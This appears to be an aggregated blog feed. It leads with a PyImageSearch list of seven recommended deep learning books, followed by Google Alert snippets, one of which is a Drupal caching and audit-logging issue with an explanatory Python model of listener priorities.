How do I best learn? Do I like to learn from theoretical texts? Or do I like to learn from code snippets and implementation?

Everyone has their own personal learning style and your answers here will dictate which deep learning books you should be reading.

For me personally, I like to strike a balance between the two.

Deep learning books that are entirely theoretical and go too far into the abstract make it far too easy for my eyes to gloss over.

But on the other hand, if a deep learning book skips theory entirely and jumps straight into implementation, I know I’m missing out on core theoretical underpinnings that may help me approach a new deep learning problem or project.

In my opinion, a good deep learning book needs to carefully balance the two.

We need theory to help us understand the core fundamentals of deep learning — and at the same time we need implementation and code snippets to help us reinforce what we just learned.

1. Deep Learning

It’s hard (if not impossible) to write a blog post regarding the best deep learning books without mentioning Goodfellow, Bengio, and Courville’s Deep Learning text.

This book is meant to be a textbook used to teach the fundamentals and theory surrounding deep learning in a college-level classroom.

Goodfellow et al.’s Deep Learning is entirely theoretical and written for an academic audience. There is no code covered in the book.

The book starts with a discussion on machine learning basics, including the applied mathematics needed to effectively study deep learning (linear algebra, probability and information theory, etc.) from an academic perspective.

From there, the book moves into modern deep learning algorithms and techniques.

The final part of Deep Learning focuses more on current research trends and where the deep learning field is moving.

I’ve personally read through this book twice, cover to cover, and have found it incredibly valuable, provided you have the mathematical/academic rigor required for such a textbook.

Deep Learning is available for online viewing for free from the book’s homepage. You can purchase a hardcopy of the text from Amazon.

You should read this deep learning book if…

  • You learn from theory rather than implementation
  • You enjoy academic writing
  • You are a professor, undergraduate, or graduate student doing work in deep learning

2. Neural Networks and Deep Learning

My second theory-based deep learning (e)book recommendation is Neural Networks and Deep Learning by Michael Nielsen.

The book does include some code, but it's important to underline the "some" — there are a total of seven Python scripts accompanying the book, each demonstrating a fundamental machine learning, neural network, or deep learning technique on the MNIST dataset. The implementations are not the most "exciting" in the world, but they will help demonstrate some of the theoretical concepts in the text.

If you are new to machine learning and deep learning but are eager to dive into a theory-based learning approach, Nielsen’s book should be your first stop.

The book is a much quicker read than Goodfellow’s Deep Learning and Nielsen’s writing style combined with occasional code snippets makes it easier to work through.

You should read this deep learning book if…

  • You are looking for a theory-based deep learning text
  • You are new to machine learning/deep learning and want to approach the field from a more academic standpoint

3. Deep Learning with Python

Francois Chollet, Google AI researcher and creator of the popular Keras deep learning library, published his book, Deep Learning with Python in October 2017.

Francois’ book takes a practitioner’s approach to deep learning. Some theory and discussion is included, but for every few paragraphs of theory, you’ll find a Keras implementation of the technique.

One of my favorite aspects of this book is how Francois includes examples for deep learning applied to computer vision, text, and sequences, making it a well rounded book for readers who want to learn the Keras library while studying machine learning and deep learning fundamentals.

I found Francois’ writing to be clear and accessible. His additional commentary on deep learning trends and history is phenomenal and insightful.

It’s important to note that this book is not meant to be a super deep dive into deep learning. Instead, its primary use is to teach you (1) the fundamentals of deep learning (2) through the Keras library (3) using practical examples in a variety of deep learning domains.

You should read this deep learning book if…

  • You are interested in the Keras library
  • You “learn by doing/implementing”
  • You want a quick understanding of how deep learning is applied to various fields, such as computer vision, sequence learning, and text

4. Hands-On Machine Learning with Scikit-Learn and TensorFlow

When I first purchased a copy of Aurélien Géron’s Hands-on Machine Learning with Scikit-Learn and TensorFlow, I wasn’t sure what to expect — had the title not included the word “TensorFlow” I may have breezed right by it, thinking it was only a basic introduction to machine learning.

But at the same time, appending the word “TensorFlow” to an already lengthy title that seems to focus on basic machine learning made me think it was a cheap marketing tactic to sell more copies — everyone is interested in deep learning, right?

Luckily, I was wrong — the book is a good read and the title shouldn’t deter you from reading through it.

Géron’s deep learning book is organized in two parts.

The first part covers basic machine learning algorithms such as Support Vector Machines (SVMs), Decision Trees, Random Forests, ensemble methods, and basic unsupervised learning algorithms. Scikit-learn examples for each of the algorithms are included.

The second part then covers elementary deep learning concepts through the TensorFlow library.

You should read this deep learning book if…

  • You are new to machine learning and want to start with core principles with code examples
  • You are interested in the popular scikit-learn machine learning library
  • You want to quickly learn how to operate the TensorFlow library for basic deep learning tasks

5. TensorFlow Deep Learning Cookbook

If you like the “cookbook” style of teaching (little-to-no theory and lots of code), I would suggest taking a look at Gulli and Kapoor’s TensorFlow Deep Learning Cookbook.

This deep learning book is entirely hands-on and is a great reference for TensorFlow users.

Again, this book is not meant to necessarily teach deep learning, but instead show you how to operate the TensorFlow library in the context of deep learning.

Don’t get me wrong — you will absolutely learn new deep learning concepts, techniques, and algorithms along the way, but the book takes a heavy-handed cookbook approach: lots of code and explanations of what the code is doing.

My only criticism of the book is that there are some typos in the code snippets. This can be expected when writing a book that is entirely code focused. Typos happen, I can certainly attest to that. Just be aware of this when you are working through the text.

You should read this deep learning book if…

  • You have already studied the fundamentals of deep learning
  • You are interested in the TensorFlow library
  • You enjoy the “cookbook” style of teaching where code is provided to solve a particular problem but the underlying theory is not discussed

6. Deep Learning: A Practitioner's Approach

While most deep learning books that include code samples use Python, Adam Gibson and Josh Patterson’s Deep Learning: A Practitioner's Approach instead uses Java and the DL4J library.

Why Java?

Java is one of the most widely used programming languages in large corporations, especially at the enterprise level.

The first few chapters in Gibson and Patterson’s book discuss basic machine learning and deep learning fundamentals. The rest of the book includes Java-based deep learning code examples using DL4J.

You should read this deep learning book if…

  • You have a specific use case where the Java programming language needs to be utilized
  • You work for a large company or enterprise organization where Java is primarily used
  • You want to understand how to operate the DL4J library

7. Deep Learning for Computer Vision with Python

I’ll be completely honest and forthcoming and admit that I’m biased — I wrote Deep Learning for Computer Vision with Python.

That said, my book really has become one of the best deep learning and computer vision resources available today (take a look at this review and this one as well if you need an honest second opinion).

Francois Chollet, AI researcher at Google and creator of Keras, had this to say about my new deep learning book:

This book is a great, in-depth dive into practical deep learning for computer vision. I found it to be an approachable and enjoyable read: explanations are clear and highly detailed. You’ll find many practical tips and recommendations that are rarely included in other books or in university courses. I highly recommend it, both to practitioners and beginners. — Francois Chollet

And Adam Geitgey, the author of the popular Machine Learning is Fun! blog series, said this:

I highly recommend grabbing a copy of Deep Learning for Computer Vision with Python. It goes into a lot of detail and has tons of detailed examples. It’s the only book I’ve seen so far that covers both how things work and how to actually use them in the real world to solve difficult problems. Check it out! — Adam Geitgey

If you’re interested in studying deep learning applied to computer vision (image classification, object detection, image understanding, etc.), this is the perfect book for you.

Inside my book you will:

  • Learn the foundations of machine learning and deep learning in an accessible manner that balances both theory and implementation
  • Study advanced deep learning techniques, including object detection, multi-GPU training, transfer learning, and Generative Adversarial Networks (GANs)
  • Replicate the results of state-of-the-art papers, including ResNet, SqueezeNet, VGGNet, and others on the 1.2-million-image ImageNet dataset

Furthermore, I provide the best possible balance of both theory and hands-on implementation. For each theoretical deep learning concept you’ll find an associated Python implementation to help you cement the knowledge.

Be sure to take a look — and while you’re checking out the book, don’t forget to grab your (free) table of contents + sample chapters PDF of the book.

You should read this deep learning book if…

  • You are specifically interested in deep learning applied to computer vision and image understanding
  • You want an excellent balance between theory and implementation
  • You want a deep learning book that makes seemingly complicated algorithms and techniques easy to grasp and understand
  • You want a clear, easy to follow book to guide you on your path to deep learning mastery

Summary

In this post you discovered my seven favorite books for studying deep learning.

Have you purchased or read through one of these books? If so, leave a comment and let me know what you think of it.

Did I miss a book that you think should be on this list? If so, be sure to contact me or leave a comment.

The post The 7 best deep learning books you should be reading right now appeared first on PyImageSearch.



from PyImageSearch http://ift.tt/2FfB9la
via IFTTT

anonymous-php/containers

Collection of simple but useful implementations of ContainerInterface from PSR-11.

from Google Alert - anonymous http://ift.tt/2oPe5mc
via IFTTT

FICTION_L Digest - 28 Feb 2018 to 4 Mar 2018 (#2018-39)

There is 1 message totaling 540 lines in this issue. Topics of the day: 1. Stoker Awards (Horror Writers Association) awarded last night. To unsubscribe from the FICTION_L list, click the following link: http://ift.tt/2FVcCCY

Source: Gmail -> IFTTT-> Blogger

Slow Arrow

Buy Slow Arrow by Anonymous (eBook) online at Lulu. Visit the Lulu Marketplace for product details, ratings, and reviews.

from Google Alert - anonymous http://ift.tt/2oGSSvE
via IFTTT

Sunday, March 4, 2018

EventSubscriber not run on Cached pages for Anonymous users

The EventSubscriber doesn't run before the dynamic page cache, so page requests from anonymous users are not logged. http://ift.tt/2Fd21m1 seems to propose a solution to this problem.

from Google Alert - anonymous http://ift.tt/2FSl0Dl
via IFTTT
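The issue above is a general one for audit logging in event-driven request pipelines, not just Drupal: kernel.request listeners run in descending priority, and the first listener that attaches a response stops propagation, so a logger registered below the cache listener never sees a cache hit. In Drupal 8 the Dynamic Page Cache subscriber listens to kernel.request at priority 27, so an audit subscriber at the default priority of 0 silently misses every cached anonymous page view. The model below is an added example written for this page, not Drupal's own code or the code from the linked issue; the dispatcher, the listeners and the traffic are constructed, and the cache is simplified to anonymous-only entries (the real Dynamic Page Cache varies entries by cache context and also serves authenticated users). It shows the log that results from registering the logger at priority 0 versus one notch above the cache.

```python
"""
Constructed model of a Symfony/Drupal-style kernel.request dispatch:
listeners run in descending priority, and the first one that attaches a
response stops propagation. Example code, not Drupal's own.
"""
from dataclasses import dataclass
from typing import Callable, Dict, List, Optional, Tuple


@dataclass
class Request:
    path: str
    user: Optional[str]  # None means anonymous

    @property
    def anonymous(self) -> bool:
        return self.user is None


@dataclass
class RequestEvent:
    request: Request
    response: Optional[str] = None

    def has_response(self) -> bool:
        return self.response is not None


Listener = Callable[[RequestEvent], None]


class Dispatcher:
    """Minimal priority-ordered dispatcher with early termination on response."""

    def __init__(self) -> None:
        self._listeners: List[Tuple[int, Listener]] = []

    def add_listener(self, listener: Listener, priority: int = 0) -> None:
        self._listeners.append((priority, listener))
        # Highest priority first; the stable sort keeps registration order on ties.
        self._listeners.sort(key=lambda pair: -pair[0])

    def dispatch(self, event: RequestEvent) -> RequestEvent:
        for _priority, listener in self._listeners:
            listener(event)
            if event.has_response():
                break  # a responder short-circuits every listener below it
        return event


class DynamicPageCache:
    """Serves anonymous repeat hits from cache (simplified; Drupal's runs at 27)."""
    PRIORITY = 27  # Drupal's DynamicPageCacheSubscriber priority on kernel.request

    def __init__(self) -> None:
        self._cache: Dict[str, str] = {}

    def on_request(self, event: RequestEvent) -> None:
        req = event.request
        if req.anonymous and req.path in self._cache:
            event.response = self._cache[req.path]

    def store(self, req: Request, body: str) -> None:
        if req.anonymous:  # simplification: only anonymous responses are cached here
            self._cache[req.path] = body


class AuditLogger:
    """The subscriber the issue describes: records who requested which path."""

    def __init__(self) -> None:
        self.log: List[str] = []

    def on_request(self, event: RequestEvent) -> None:
        r = event.request
        self.log.append(f"{r.user or 'anonymous'} {r.path}")


def render(req: Request) -> str:
    return f"<html>{req.path}</html>"  # stand-in for routing and the controller


def serve(requests: List[Request], audit_priority: int) -> Tuple[List[str], List[str]]:
    """Push requests through the pipeline; return (responses, audit log)."""
    dispatcher, cache, audit = Dispatcher(), DynamicPageCache(), AuditLogger()
    dispatcher.add_listener(cache.on_request, DynamicPageCache.PRIORITY)
    dispatcher.add_listener(audit.on_request, audit_priority)
    responses = []
    for req in requests:
        event = dispatcher.dispatch(RequestEvent(req))
        body = event.response if event.has_response() else render(req)
        if not event.has_response():
            cache.store(req, body)
        responses.append(body)
    return responses, audit.log


CONSTRUCTED_TRAFFIC = [
    Request("/node/1", None),     # anonymous, cold cache: rendered and cached
    Request("/node/1", None),     # anonymous, warm cache: answered by the cache listener
    Request("/node/1", "alice"),  # authenticated: bypasses this simplified cache
]

if __name__ == "__main__":
    print("audit at priority 0 :", serve(CONSTRUCTED_TRAFFIC, 0)[1])
    print("audit at priority 28:", serve(CONSTRUCTED_TRAFFIC, DynamicPageCache.PRIORITY + 1)[1])
```

Raising the subscriber's priority above 27 fixes logging for Dynamic Page Cache hits, but it is not enough for anonymous traffic when the Internal Page Cache module is enabled: that cache is an http_middleware at priority 200 that answers before the kernel dispatches kernel.request at all, so a subscriber at any priority never runs on its hits. For a complete audit trail of anonymous requests, log from an http_middleware registered above 200 or at the web server or reverse proxy, in front of every cache.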

Anonymous UBC

Anonymous UBC is a very private individual who doesn't want their personal effects scattered across the internets, thank you very much and have a good day.

from Google Alert - anonymous http://ift.tt/2FdcJJd
via IFTTT

Clouds, Birds, Moon, Venus


Sometimes the sky above can become quite a show. In early September of 2010, for example, the Moon and Venus converged, creating quite a sight by itself for sky enthusiasts around the globe. From some locations, though, the sky was even more picturesque. In the featured image taken in Spain, a crescent Moon and the planet Venus, on the far right, were captured during sunset posing against a deep blue sky. In the foreground, dark storm clouds loom across the image bottom, while a white anvil cloud shape appears above. Black specks dot the frame, caused by a flock of birds taking flight. Very soon after this picture was taken, however, the birds passed by, the storm ended, and Venus and the Moon set. Bright Venus is again visible just after sunset this month (2018 March) and will appear quite near Mercury tonight and the rest of this week. via NASA http://ift.tt/2F7vb9Y

anonymous 75x75

anonymous 75x75. Department of Pharmacology · Research · Prof. Anne Willis · Research Interest · Publications · Willis Group · Laboratory Alumni · Laboratory News · Willis Docs-img · figure1600x450.jpg · WillisLab2016620x206.jpg · Jana75x75.jpg · tatyanachernova75x75.jpg · veronica 75x75 ...

from Google Alert - anonymous http://ift.tt/2tjpznK
via IFTTT